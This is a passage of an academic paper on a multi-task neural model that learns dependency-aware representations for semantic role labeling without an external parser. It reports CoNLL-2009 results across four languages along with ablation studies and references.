Plank, 2016; Søgaard and Goldberg, 2016; Hashimoto et al., 2017), name error detec- tion (Cheng et al., 2015), machine translation (Luong et al., 2016), supersense tagging (Bingel and Søgaard, 2017), entailment (Hashimoto et al., 2017), and semantic role labeling (Collobert et al., 2011b; Strubell et al., 2018). Experimental results on the CoNLL-2009 benchmark dataset show that our model is able to outperform the state of the art in English, and to improve SRL performance in other languages, including Chinese, German, and Spanish. 2 Model Description Most supervised semantic role labeling systems adopt an architecture consisting of the following steps: (a) predicate identification and disambigua- tion (e.g., crowds in Figure 1 is a predicate with sense crowd.02); (b) argument identification (e.g., the arguments of the predicate crowds in Figure 1 are He and plate); and (c) argument classification (e.g., the semantic roles for He and plate are A0 and A1, respectively). In this paper we focus solely on identifying arguments and labeling them with semantic roles using an off- the-shelf disambiguation model for the first step (Björkelund et al., 2010; Roth and Lapata, 2016). Our semantic role labeler is built on top of the syntax-agnostic model of Marcheggiani et al. 344 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 (2017), which achieves good performance on the CoNLL-2009 English dataset without making use of a parser. Figure 2 provides a schematic overview of our model, which has two main components, namely, a dependency information extractor, and a semantic role predictor. The aim of the dependency extractor is to learn syntactic information for each word which subsequently serves as input (combined with word representa- tions) to the semantic role labeler. The dependency extractor consists of: • a word representation component (which boils down to a simple embedding look-up); • a K-layer bidirectional LSTM (BiLSTM) encoder that takes as input the repre- sentation of each word in a sentence and produces context-dependent embeddings; • two multilayer perceptron (MLP) networks that predict the dependency label and type of arc between a word and a predicate. The semantic role predictor consists of: • a word representation component that en- capsulates predicate-specific dependency information; • a J-layer BiLSTM encoder that takes as input the representation of each word in a sentence; • a classifier that takes as input the BiLSTM representations of predicates and their arguments and assigns semantic roles to the latter. In the following sections we describe these two components more formally. 2.1 Dependency Information Extractor The dependency information extractor (bottom block in Figure 2) operates on sentences after predicate identification (and disambiguation) has taken place. It learns important syntactic information (i.e., the dependency relation between a predicate and its candidate arguments), which is subsequently used by the semantic role labeler. In the description below we assume that predicates are known. Sentence Encoder We represent words as the concatenation of three vectors: a randomly initial- ized word embedding x′re ∈ Rdw , a pre-trained word embedding x′pe ∈ Rdw estimated on an exter- nal text collection, and a character embedding xcei learned by convolutional neural network (CNN) with bidirectional LSTM (BiLSTM). The final word representation is given by x = x′re◦x′pe◦x′ce, where ◦ represents the concatenation operator. Following Marcheggiani et al. (2017), sen- tences are represented using a bi-directional re- current neural network with LSTMs (Hochreiter and Schmidhuber, 1997). A bidirectional LSTM receives at time step t a representation x for each word and recursively computes two hidden states, one for the forward pass ( −→ ht ), and another one for the backward pass ( ←− ht ). Each word is the concatenation of its forward and backward LSTM state vectors ht = −→ ht ◦ ←− ht . Dependency Label Prediction Our model focuses on predicting the dependency labels of predicates as opposed to all words in a dependency tree. For each arc (w, p) consisting of predicate p and modifier w, our model assigns the dependency label l with the highest score according to a multilayer perceptron (MLP): label(w, p) = arg max l∈labels MLPLBL(hw ◦hp)[l] (1) where l are pre-defined dependency labels (e.g., SUBJ, OBJ), and hw and hp are the hidden states of the bidirectional sentence encoder repre- senting word w and predicate p, respectively (see the bottom BiLSTM in Figure 2). The inner structure of the MLP is shown in Figure 3. Dependency label scores for arc (w, p) are calculated as follows: MLPLBL = WLBL tanh(Wwhw + Wphp) (2) where Ww, Wp, and WLBL are parameter matrices. In our experiments we use a two-layered BiLSTM encoder following Kiperwasser and Goldberg (2016), who show that placing a dependency classifier on top of two BiLSTM layers achieves best results for labeled dependency parsing. Link Type Prediction Our aim is to capture how semantic predicates are linked to adjacent words in a sentence. Specifically, we are interested in predicting whether they are linked, and, if they are, what type of link they have. Again, we only 345 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 Figure 2: Model overview: Dependency information extractor (bottom) and a semantic role labeler (top). Colored lines are syntax-aware representations for the word He and are shared between the two components. Figure 3: Dependency label prediction. Blue lines denote dependency arcs between words in the sentence and the predicate crowds. focus on syntactic arcs pertaining to the semantic predicate, rather than all arcs in the dependency tree, and assign each word a label representing its link type in relation to the predicate. Tag N indicates there is no arc between a word and the Figure 4: Predicting the link type of each word in a sentence. Blue lines denote dependency arcs between words in the sentence and the predicate crowds. predicate, whereas tags C and P represent child and parent nodes of the predicate, respectively. Figure 4 shows an example of how these labels are processed by our model. We extract predicate linking information from dependency 346 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 tree annotations, and use a MLP predictor to identify link type information for word wt : MLPLNK = WLNK tanh(WLht) (3) A key difference between the dependency label classifier and the link type predictor is that the latter does not explicitly use hp, namely, predicate- specific information. By doing this, we force the model to learn the linking between long-distance word pair. For a sentence with more than one predicates, the dependency information extractor will produce different results for each predicate. 2.2 Syntax-aware Semantic Role Labeler Our semantic role labeler (upper block in Figure 2) estimates the probability of role r given the hidden states of candidate argument word i and predicate word p: p(r|ti, tp, l) ∝ exp(Wl,r(ti ◦ tp)), (4) where ti and tp are representations for word i and predicate p, respectively, and l is the lemma of predicate p; symbol◦denotes concatenation and∝ signifies proportionality. Following Marcheggiani and Titov (2017), matrix Wl,r is the joint embed- ding of role r and the predicate lemma l using a non-linear transformation: Wl,r = ReLU(U(el ◦ er)) (5) where U is a parameter matrix, and el ∈ Rd ′ l and er ∈ Rdr are randomly initialized embeddings of predicate lemmas and roles. This way, each role prediction is predicate-specific, and a good representation for roles associated with infrequent predicates can be learned. The model’s training objectiveL is the weighted sum of objectives for the SRL task and the two auxiliary tasks. Formally, L = LSRL + α(LLBL + LLNK), (6) where LSRL, LLBL, and LLNK are the categor- ical cross-entropy of SRL, dependency label prediction, and link type prediction, respectively. α is a scalar weight for the auxiliary tasks whose value is tuned experimentally on the development dataset. We will next discuss how the hidden states ti and tp are obtained taking into account the the dependency extractor introduced earlier. Input Layer Representations Given a sentence with words (w1, . . . , wN), we form a syntax- agnostic word representation x for each word using randomly initialized word embedding xre ∈ Rdw , pre-trained word embedding xpe ∈ Rdw estimated on an external text collection, randomly initialized part-of-speech tag embedding xpos ∈ Rdpos , and randomly initialized lemma embedding xle ∈ Rdl (active only if the word is a predicate). The word representation is thus given by x = xre ◦ xpe ◦ xpos ◦ xle, where ◦ represents the concatenation operator. The parameters of the pre-trained word embed- dings xpe are shared with the word embeddings x ′ pe used for our dependency information extrac- tor, and are updated during training. In order to obtain more syntax-aware representations, we utilize hidden-layer representations vhidden and dependency embeddings (elabel and elink). The final representation R, which serves as input to the SRL, is the concatenation of three syntactically informed representations: R = x◦vhidden ◦elabel ◦elink (7) Hidden-layer Representations In order to com- pute vhidden, we draw inspiration from ELMo (Peters et al., 2018), a recently proposed model for generating word representations based on bidirectional LSTMs trained with a coupled lan- guage model objective. Unlike more traditional word embeddings (Mikolov et al., 2013), ELMo representations are deep, essentially a linear com- bination of the representations learned at all layers of the LSTM instead of just the final layer. We also utilize the combination of the inter- mediate layer representations in the dependency information extractor. Given sentence (w1, . . . , wN), a BiLSTM encoder with L layers com- putes for each word a set of 2L representations: S = {�hj, ←− h j|j = 1, . . . , L} = {hj|j = 1, . . . , L} (8) where hj = [�hj; ←− h j] for each hidden layer in the BiLSTM encoder. In order to make use of all layers in S for our SRL task, we collapse them into a single vector. Although we could simply concatenate these representations or select the top layer, we compute 347 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 vector vhidden as a weighting of the BiLSTM layers, followed by a non-linear projection: vhidden = ReLU(Whidden(γ j=L∑ j=1 βjhj)) (9) where β are softmax-normalized weights for hj , and the scalar parameter γ is of practical importance for optimization, as it allows the model to scale the weighted hidden-layer representations (Peters et al., 2018); both β and γ are updated during training. Dependency Embeddings An obvious way to take advantage of the dependency label predictions (see Section 2.1) would be to use the embedding el of the label l with the highest score. However, this would place too much emphasis on high confidence labels, which can be noisy. Instead, we use the weighted composition of all dependency label embeddings elabel, which is calculated as: elabel = ∑ l∈labels softmax(MLPLBL)[l]∗el (10) where the weight of each label embedding is the normalized probability given by the label classifier. Analogously, we represent dependency link information elink as: elink = ∑ l∈{N,C,P} softmax(MLPLNK)[l]∗el (11) 3 Experiments We implemented our model in PyTorch1 and evaluated it on the English, Chinese, German, and Spanish CoNLL-2009 benchmark datasets following the standard training, testing, and development set splits. The datasets contain gold- standard dependency annotations, and also gold lemmas, part-of-speech tags, and morphological features. Data for the different languages was generated by merging various language specific treebanks such as the Penn Treebank (Parcus et al., 1993) and Brown corpus (Francis and Kucera, 1979) for English, the Prague Dependency Treebank for Czech (Hajičová et al., 1999), the Chinese Treebank (Xue et al., 2005), and Proposition Bank (Xue and Palmer, 2009) for Chinese, and so on (we refer the interested reader 1Our code is available at https://github.com/ RuiCaiNLP/SRL_DEP. Hyperparameter value dw (English word embeddings) 100 dw (other languages word embeddings) 300 dc (character embeddings) 300 dpos (POS embeddings) 16 dl (lemma embeddings) 100 dh (LSTM hidden states) 300 dhidden (hidden layer representation) 200 doutput (output label embeddings) 32 dr (role representation) 128 d ′ l (output lemma representation) 128 K (BiLSTM depth) 4 J (BiLSTM depth) 2 batch size 30 input layer dropout rate 0.3 hidden layer dropout rate 0.3 learning rate 0.001 auxiliary tasks loss weight α 0.5 Table 1: Hyperparameter values. to Hajic et al. [2009] for details on individual languages and their annotations). For experiments on English, we used the embeddings of Dyer et al. (2015), which were learned using the structured skip n-gram approach of Ling et al. (2015). In a few experiments we also used English character embeddings following He et al. (2018). These were pre-trained with a CNN-BiLSTM model (Peters et al., 2018) on the 1 Billion Word Benchmark,2 which is publicly released as part of the AllenNLP toolkit.3 Embeddings4 for Chinese, Spanish, and German were pre-trained on Wikipedia using fastText (Bojanowski et al., 2017). The dropout mechanism was applied to the input layer and the top hidden layer of the BiLSTM encoders. We used the Adam optimizer (Kingma and Ba, 2014) to train our models. We performed hyperparameter tuning and model selection on the English development set; optimal hyperparameter values (for all languages) are shown in Table 1. The BiLSTM for the dependency extractor had two layers, and the BiLSTM for the semantic role labeler had four. Predicted POS tags were provided by the CoNLL-2009 shared-task organizers. For all lan- guage, we used the same predicate disambiguator 2 http://www.statmt.org/lm-benchmark/ 3https://allennlp.org/elmo 4Publicly available at https://github.com/ facebookresearch/fastText 348 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 https://github.com/RuiCaiNLP/SRL_DEP https://github.com/RuiCaiNLP/SRL_DEP http://www.statmt.org/lm-benchmark/ https://allennlp.org/elmo https://github.com/facebookresearch/fastText https://github.com/facebookresearch/fastText Single Models (with external parser) P R F Björkelund et al. (2010) 87.1 84.5 85.8 Lei et al. (2015) - - 86.6 FitzGerald et al. (2015) - - 86.7 Roth and Lapata (2016) 88.1 85.3 86.7 Marcheggiani and Titov (2017) 89.1 86.8 88.0 He et al. (2018) 89.7 89.3 89.5 Single Models (w/o external parser) P R F Marcheggiani et al. (2017) 88.7 86.8 87.7 He et al. (2018) 89.5 87.9 88.7 Ours (w/o ELMo) 90.5 88.6 89.6 Ours (with ELMo) 90.9 89.1 90.0 Ensemble Models P R F FitzGerald et al. (2015) - - 87.7 Roth and Lapata (2016) 90.3 85.7 87.9 Marcheggiani and Titov (2017) 90.5 87.7 89.1 Table 2: English results on the CoNLL-2009 in-domain (WSJ) test set. as in Roth and Lapata (2016) which uses a pipeline of mate-tools (Björkelund et al., 2010). 3.1 Results Our results on the English (in-domain) test set are summarized in Table 2. We compared our system against previous models that use a dependency parser (first block in the table) and those that do not (second block). We also report the results of various ensemble SRL models (third block). For a fair comparison with He et al. (2018), we present a variant of our model with character- based ELMo embeddings. Most comparisons involve neural systems that are based on BiLSTMs (Marcheggiani et al., 2017; Marcheggiani and Titov, 2017; He et al., 2018) or use neural networks for learning SLR-specific embeddings (FitzGerald et al., 2015; Roth and Lapata, 2016). We also report the results of two strong symbolic models based on tensor factorization (Lei et al., 2015) and a pipeline of modules that carry out the tokenization, lemmatization, part-of-speech tagging, dependency parsing, and semantic role labeling (Björkelund et al., 2010). As can be seen in Table 2, our model outper- forms previous single and ensemble models, irre- spective of whether they make use of a dependency parser or not. When taking into account ELMo embeddings, our model achieves 90.0% F1, which Single Models (with external parser) P R F Björkelund et al. (2010) 75.7 72.2 73.9 Lei et al. (2015) - - 75.6 FitzGerald et al. (2015) - - 75.2 Roth and Lapata (2016) 76.9 73.8 75.3 Marcheggiani and Titov (2017) 78.5 75.9 77.2 He et al. (2018) 81.9 76.9 79.3 Single Models (w/o external parser) P R F Marcheggiani et al. (2017) 79.4 76.2 77.7 He et al. (2018) 81.7 76.1 78.8 Ours (w/o ELMo) 80.5 78.2 79.4 Ours (with ELMo) 80.8 78.6 79.7 Ensemble Models P R F FitzGerald et al. (2015) - - 75.5 Roth and Lapata (2016) 79.7 73.6 76.5 Marcheggiani and Titov (2017) 80.8 77.1 78.9 Table 3: English results on the CoNLL-2009 out-of domain (Brown) test set. is an absolute improvement of 0.5 percentage point over the state of the art (He et al., 2018). It is also interesting to note that the performance of He et al. (2018) drops from 89.5% to 88.7% when a depen- dency parser is not available, whereas our model is able to extract dependency information on its own, without relying on external syntactic parsers. Results on the out-of-domain English test set are presented in Table 3. We include comparisons with the same models as in the in-domain case. Again, our syntax-light model outperforms previ- ously published single and ensemble models, even when ELMo character embeddings are not taken into account (F1 increases from 79.4% to 79.7% with ELMo). It is perhaps not surprising that our model outperforms by a wide margin semantic role labelers that rely heavily on syntactic parsers (Roth and Lapata, 2016; Marcheggiani and Titov, 2017). Their performance degrades considerably on out-of-domain data and the syntactic trees they produce are noisy, compromising the accuracy of the SRL systems that rely on them. Our model only makes use of features extracted from hidden layers and the weighted sum of output embed- dings, rather than the output of any parser, and as a result is less brittle in this setting. In Table 4 we report results from additional experiments on Chinese, German, and Spanish. Although we have not performed detailed 349 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 Chinese P R F Björkelund et al. (2010) 82.4 75.1 78.6 Roth and Lapata (2016) 83.2 75.9 79.4 Marcheggiani and Titov (2017) 84.6 80.4 82.5 He et al. (2018) 84.2 81.5 82.8 Ours 85.5 81.8 83.6 German P R F Björkelund et al. (2010) 81.2 78.3 79.7 Roth and Lapata (2016) 81.8 78.5 80.1 Ours 83.9 81.5 82.7 Spanish P R F Björkelund et al. (2010) 78.9 74.3 76.5 Roth and Lapata (2016) 83.2 77.4 80.2 Marcheggiani et al. (2017) 81.4 79.3 80.3 Ours 83.1 80.5 81.8 Table 4: Results on the CoNLL-2009 test sets for Chinese, German, and Spanish. parameter selection in these languages (i.e., we used the same parameters as in English), our model achieves state-of-the-art performance across lan- guages. Note that ELMo character embeddings are not available in Chinese and as a result differ- ences in performance between our model and He et al. (2018) are more noticeable compared with English (our system outperforms theirs by 0.5 percentage point F1). For German and Spanish, our model also achieves the best overall F1-scores of 82.7% and 81.8%, respectively. 3.2 Ablation Studies and Analysis In order to evaluate the contribution of various model components, we performed a series of ablation studies on the English development set without predicate disambiguation. We performed ablation studies without ELMo embeddings, as they could introduce external syntactic and semantic information, potentially obscuring any conclusions about the behavior of our own model. Our ablation experiments are summarized in Table 5. The first block shows the performance of the full model. In the second block, we focus on the effect of different kinds of syntactic represen- tations. First, we examined whether it is advan- tageous to share word embeddings between the semantic role labeler and the dependency extrac- tor. We observed that a version of the model that updates pre-trained word embeddings separately performs slightly worse. Second, we observe a 0.8% drop in F1 when not using the representations System P R F Ours 86.6 84.8 85.7 w/o sharing word embeddings 86.1 84.7 85.4 w/o hidden-layer representation 86.0 83.9 84.9 w/o output embeddings 86.6 84.4 85.5 w/o multi-task learning 85.8 84.2 84.9 with full parser 86.3 85.0 85.6 w/o joint training 85.9 84.8 85.3 Table 5: Ablation results on the CoNLL-2009 English development set. of the hidden states in the dependency extractor. The result indicates that features captured by hid- den layers for the dependency prediction task are also helpful in semantic role labeling. Third, we see that not directly using the results of the depen- dency extractor slightly hurts SRL performance (we observe a 0.2 percentage point drop in F1). This is not surprising as the semantic role labeler and dependency information extractor are trained simultaneously. At the beginning of the training process the performance of the extractor is low, so the semantic role labeler gradually learns how to utilize noisy label embeddings, instead of rely- ing on the accuracy of extractor. This makes our model more robust in situations where the depen- dency extractor cannot achieve high performance, and also explains why our model performs better on the out-of-domain test set compared with other systems relying on parsers. In the third block of Table 5, we first verify whether multi-task learning is critical to our SRL task by removing the term (LLBL + LLNK) from the training objective (see Equation (6)) and observe a 0.8 percentage point drop in F1. In Figure 5 we compare the full model with multi- task learning against a model trained only for semantic role labeling (SRL only) in more detail. We group the semantic roles assigned by the two models (our full model vs. SRL only) by their dependency labels. As can be seen, the full model outperforms SRL-only on most dependency labels except OPRD and TMP, which account only for 3% of semantic roles. We observe noticeable gains for semantic roles with dependency labels NMOD, OBJ, SBJ, and ADV, which appear relatively frequently in the development set. In Table 6, we present model performance for verbal and nominal predicates, and again compare the results of the full 350 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 Figure 5: Semantic role labeling performance on the English CoNLL-2009 development set; roles are grouped into corresponding dependency relations whose proportional frequencies shown in parentheses (x-axis). Verbal Ours SRL only Frequency(%) A0 92.9 92.2 15% A1 93.5 92.8 21% A2 84.3 82.8 5% AM-* 80.8 80.1 16% All 89.1 88.3 61% Nominal Ours SRL only Frequency(%) A0 84.4 83.1 10% A1 87.8 86.3 16% A2 82.7 81.5 7% AM-* 77.0 75.7 5% All 84.5 83.2 39% Table 6: F1 results on the English test set broken down into verbal and nominal predicates. model against an SRL only model. Both models are worse at predicting the semantic roles of nominal predicates (compared with verbal ones). However, our model is generally more accurate, especially for nominal predicates, bringing an overall improvement of 1.3 percentage point in F1. We next substituted the dependency extractor with a full parser, specifically, the graph-based neural model of Kiperwasser and Goldberg (2016). The parser, enhanced model achieves a performance of 85.6% in F1, which is quite close to the model relying on the dependency extractor (see row ‘‘with full parser’’ in Table 5). This indicates that we are able to capture most of the information contained in a syntactic parser without any overhead incurred by full-blown parsing. We observed that using a full parser leads to a 0.2 per- centage point F1 increase in recall, but at the expense of precision which drops by 0.3 percent- age point. As shown in Figure 5, approximately 32% of the arguments in the English development set are not directly linked to the predicate (see no arc bar). Long-range dependencies often pose problems for SRL models; in fact, special net- works like GCN (Marcheggiani and Titov, 2017) and PathLSTM (Roth and Lapata, 2016) have been proposed to explicitly percolate information from each word in the sentence to its syntactic neighbors. However, PathLSTM performs worse than a vanilla BiLSTM model in the case of long- distance arguments, and the performance of an SRL model augmented with GCN also decreases when more than one GCN layer is stacked. One of the disadvantages of using an external parser are errors that then propagate through paths in the tree. In our model, a word’s dependency information solely relates to the predicate under consider- ation, which renders the semantic role labeler aware of the overall dependency structure of the input sentence without, however, propagating errors to other words. Although the dependency information extractor is trained to recognize arcs pertaining to the predicate, its hidden layers still capture syntactic features for long-distance argu- ments and share them with the semantic role labeler. As shown in the first bar of Figure 5, arguments not directly linked to the predicate are identified more accurately with the full model (F1 improves by approximately 2 percentage point). Finally, instead of building a dependency information extractor, we simply took the one-best outputs of the trained full parser and directly used them as word representations (i.e., replacing the elink and elabel). This means that the full parser is pre-trained and its parameters will not be updated during the training process for SRL. We see (row ‘‘w/o joint training’’ in Table 5) that compared with the model using a full parser, removing joint training further hurts SRL performance (0.3 percentage point drop in F1). 3.3 Dependency Annotations Although our model does not rely on an exter- nal parser for providing information pertaining to dependency relations, it nevertheless requires gold standard dependency annotations for training the dependency extractor component (i.e., depen- dency label and link prediction). As manual anno- tations are expensive and not always available, we also examined whether it is possible to obtain competitive performance with fewer annotations. 351 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 Figure 6: SRL performance on the English CoNLL- 2009 development set when different proportions of dependency annotations are used for training. Figure 6 shows how F1 varies when the full model is trained on increasing amounts of depen- dency annotations. Like our previous ablation studies, we do not perform predicate disambigua- tion and do not use character embeddings in these experiments. We randomly choose a subset of training samples (10%, 20% etc.) with depen- dency annotations, and if the input sample is in the subset, we update model parameters during training according to the combined loss of the SRL and auxiliary tasks, otherwise parameters are updated for the SRL task only. It is obvious from Figure 6 that the performance of our model increases gradually with more annotations. Interestingly, we observe a large jump in performance with only 10% of the available dependency annotations (F1 improves from 84.5% to 85%). The model’s performance becomes competitive when 80% of the annotations are used, and remains stable when more annotations are provided. In general, these results suggest that our model can also work effectively when a small number of gold dependency labels are given as a supervision signal to the dependency information extractor. 4 Related Work Our model resonates with the recent trend of developing neural network models for semantic role labeling. It also agrees with previous work in devising ways to better take advantage of syntactic information for the SRL task within a relatively simple modeling framework based on bi-directional LSTMs (Marcheggiani et al., 2017). Previous proposals for incorporating syn- tactic information include the use of low-rank tensor factorizations (Lei et al., 2015), convolu- tional and time-domain neural networks (Foland and Martin, 2015), jointly embedded arguments and semantic roles in a shared vector space (FitzGerald et al., 2015), learning representations of shortest dependency paths between a predicate and its potential arguments (Roth and Lapata, 2016), encoding sentences with graph convolu- tional networks (Marcheggiani and Titov, 2017), constrained decoding (He et al., 2017), and argu- ment pruning (He et al., 2018). In contrast to these approaches, we do not use an external dependency parser but rather incorporate syntactic informa- tion as part of the model’s learning objective. Aside from assigning semantic roles, our model performs two auxiliary tasks (dependency and link type prediction), thereby learning syntactic information specific to the SRL task. Multi-task learning (MTL; Caruana, 1993) has been a popular approach for various NLP tasks, starting with Collobert et al. (2011a) who propose a multi-task model for POS-tagging, chunking, named entity recognition, and SRL. Søgaard and Goldberg (2016) train a multi-task model for POS-tagging, syntactic chunking, and combinatory categorical grammar supertagging, while Hashimoto et al. (2017) introduce a joint many-task model together with a strategy for suc- cessively growing its depth to solve increasingly complex tasks. Zhang and Weiss (2016) propose stack-propagation using a continuous and differ- entiable link between POS tagging and depen- dency parsing, in which POS tags are utilized as a regularizer of learned representations for parsing. MTL has also been applied to semantic depen- dency parsing (Peng et al., 2017; Swayamdipta et al., 2017) and semantic role labeling. Strubell et al. (2018) present an end-to-end SRL model that is trained to jointly predict parts of speech and predicates, perform parsing, and attend to syntactic parse parents, while assigning semantic role labels. Most recent MTL models (Bingel and Søgaard, 2017; Hashimoto et al., 2017) use different layers for multiple tasks with different datasets, separately optimizing each task at each epoch. In our case, the SRL task and the two auxiliary tasks share the same input, and as a result optimization for all three tasks takes place simultaneously which is more efficient. Also, in terms of model architecture, information from the auxiliary tasks is not incorporated by simply stacking layers on top of each other but rather is explored more directly by serving as input to the SRL model 352 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 itself. Like Strubell et al. (2018), we resort to multi-task learning in order to make use of lin- guistic information for semantic role labeling as effectively as possible. Our model is simpler in eschewing the training of a parser; it also does not predict part of speech tags or predicates, although such auxiliary tasks could be incorporated in the future. We introduce novel auxiliary tasks such as predicting the dependency label of a word and whether there exists an arc linking it to the predicate and show that they improve SRL performance for English and other languages. 5 Conclusions In this paper, we proposed a multi-task model that learns dependency aware representations for semantic role labeling without using any external parser. Experimental results across languages have shown improvements over competitive baselines and state-of-the-art systems. Through several ablation studies we have also confirmed that hidden-layer representations, pre-trained word embeddings, and label embeddings all contribute in improving the performance of our SRL model. Although the dependency extractor takes a rather local view of the sentence, concentrating on the predicate and closely related neighbors, more global syntactic information is neverthe- less implicitly captured. Even when dependency annotations are sparse, our model is able to encap- sulate syntactic information and improve upon a syntax agnostic variant. Directions for future work are many and varied. We would like to improve our multi-task model by determining the value of α (i.e., the loss weight for the two auxiliary tasks) dynamically. This would allow us to optimize performance for the main and auxiliary tasks at the same time. Our experiments in this work have focused exclusively on dependency-based formalisms for representing semantic predicate-argument structures (as oper- ationalized in the CoNLL-2008 shared task). An interesting question is whether our model would work equally well for semantic role representa- tions based on constituents (i.e., phrases or spans) such as those annotated in the CoNLL-2005 shared task (Carreras and Màrquez, 2005) or OntoNotes (Pradhan et al., 2013). Addressing this question would also allow direct comparisons with recently proposed span-based models (He et al., 2017; Strubell et al., 2018). Finally, a more ambitious goal would be to learn a semantic role labeler in a weakly supervised setting where only annotations for dependency labels are available. Acknowledgments We thank the anonymous reviewers for their feed- back and the action editor Alessandro Moschitti for his comments. We gratefully acknowledge the support of the European Research Council (award number 681760, ‘‘Translating Multiple Modalities into Text’’). References Wilker Aziz, Miguel Rios, and Lucia Specia. 2011. Shallow semantic trees for SMT. In Proceedings of the Sixth Workshop on Sta- tistical Machine Translation, pages 316–322. Edinburgh. Dzmitry Bahdanau, Kyunghyun Cho, and Yoshua Bengio. 2015. Neural machine translation by jointly learning to align and translate. In Proceedings of the 3rd International Confer- ence on Learning Representations. San Diego, CA. Joachim Bingel and Anders Søgaard. 2017. Iden- tifying beneficial task relations for multi-task learning in deep neural networks. In Proceed- ings of the 15th Conference of the European Chapter of the Association for Computa- tional Linguistics: Volume 2, Short Papers, pages 164–169. Johannes Bjerva, Barbara Plank, and Johan Bos. 2016. Semantic tagging with deep residual networks. In Proceedings of COLING 2016, the 26th International Conference on Com- putational Linguistics: Technical Papers, pages 3531–3541. Osaka. Anders Björkelund, Bernd Bohnet, Love Hafdell, and Pierre Nugues. 2010. A high-performance syntactic and semantic dependency parser. In Proceedings of the 23rd International Con- ference on Computational Linguistics: Demon- strations, pages 33–36. Piotr Bojanowski, Edouard Grave, Armand Joulin, and Tomas Mikolov. 2017. Enriching word vec- tors with subword information. Transactions of 353 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 the Association for Computational Linguistics, 5:135–146. Xavier Carreras and Lluı́s Màrquez. 2005. Intro- duction to the CoNLL-2005 shared task: Se- mantic role labeling. In Proceedings of the Ninth Conference on Computational Nat- ural Language Learning (CoNLL-2005), pages 152–164. Ann Arbor, MI. Richard Caruana. 1993. Multitask learning: A knowledge-based source of inductive bias. In Proceedings of the 10th International Con- ference on Machine Learning, pages 41–48. Hao Cheng, Hao Fang, and Mari Ostendorf. 2015. Open-domain name error detection using a multi-task RNN. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 737–746. Lisbon. Janara Christensen, Mausam, Stephen Soderland, and Oren Etzioni. 2011. An analysis of open information extraction based on semantic role labeling. In Proceedings of the 6th Inter- national Conference on Konwledge Capture, pages 113–119. Banff. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011a. Natural language processing (almost) from scratch. Journal of Machine Learning Research, 12(Aug):2493–2537. Ronan Collobert, Jason Weston, Michael Karlen, Léon Bottou, Koray Kavukcuoglu, and Pavel Kuksa. 2011b. Natural language process- ing (almost) from scratch. Journal of Machine Learning Research, 12(Aug):2493–2537. Timothy Dozat and Christopher D. Manning. 2016. Deep biaffine attention for neural depend- ency parsing. CoRR, abs/1611.01734. David K Duvenaud, Dougal Maclaurin, Jorge Iparraguirre, Rafael Bombarell, Timothy Hirzel, Alan Aspuru-Guzik, and Ryan P. Adams. 2015. Convolutional networks on graphs for learning molecular fingerprints. In Advances in Neural Information Processing Systems 28, pages 2224–2232. Chris Dyer, Miguel Ballesteros, Wang Ling, Austin Matthews, and Noah A. Smith. 2015. Transition-based dependency parsing with stack long short-term memory. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics and the 7th Inter- national Joint Conference on Natural Lan- guage Processing (Volume 1: Long Papers), pages 334–343. Nicholas FitzGerald, Oscar Täckström, Kuzman Ganchev, and Dipanjan Das. 2015. Semantic role labeling with neural network factors. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing, pages 960–970. Lisbon. William Foland and James Martin. 2015. Dependency-based semantic role labeling using convolutional neural networks. In Proceedings of the Fourth Joint Conference on Lexical and Computational Semantics, pages 279–288. Nelson Francis and Henry Kucera. 1979, Brown corpus manual. Technical report, Department of Linguistics, Brown Unviersity, Providence, RI. Jan Hajič, Massimiliano Ciaramita, Richard Johansson, Daisuke Kawahara, Maria Antònia Martı́, Lluı́s Màrquez, Adam Meyers, Joakim Nivre, Sebastian Padó, Jan Štěpánek, Pavel Straňák, Mihai Surdeanu, Nianwen Xue, and Yi Zhang. 2009. The CONLL-2009 shared task: Syntactic and semantic dependencies in multiple languages. In Proceedings of the Thirteenth Conference on Computational Nat- ural Language Learning (CoNLL 2009): Shared Task, pages 1–18. Boulder, CO. Eva Hajičová, Zdeněk Kirschner, and Petr Sgall. 1999. A manual for analytic layer annotation of the Prague dependency treebank (English translation), ÚFAL MFF UK, Prague, Czech Republic. Kazuma Hashimoto, Caiming Xiong, Yoshimasa Tsuruoka, and Richard Socher. 2017. A joint many-task model: Growing a neural network for multiple NLP tasks. In Proceedings of the 2017 Conference on Empirical Methods in Natural Language Processing, pages 1923–1933. Luheng He, Kenton Lee, Mike Lewis, and Luke Zettlemoyer. 2017. Deep semantic role label- ing: What works and what’s next. In Pro- ceedings of the 55th Annual Meeting of the Association for Computational Linguistics 354 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00272 by Carnegie Mellon University user on 06 April 2021 (Volume 1: Long Papers), pages 473–483. Vancouver. Shexia He, Zuchao Li, Hai Zhao, and Hongxiao Bai. 2018. Syntax for semantic role labeling, to be, or not to be. In Proceedings of the 56th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pages 2061–2071. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9:1735–1780. Richard Johansson and Pierre Nugues. 2008. The effect of syntactic representation on semantic role labeling. In Proceedings of the 22nd International Conference on Computational Linguistics, pages 393–400. Manchester. Steven Kearnes, Kevin McCloskey, Marc 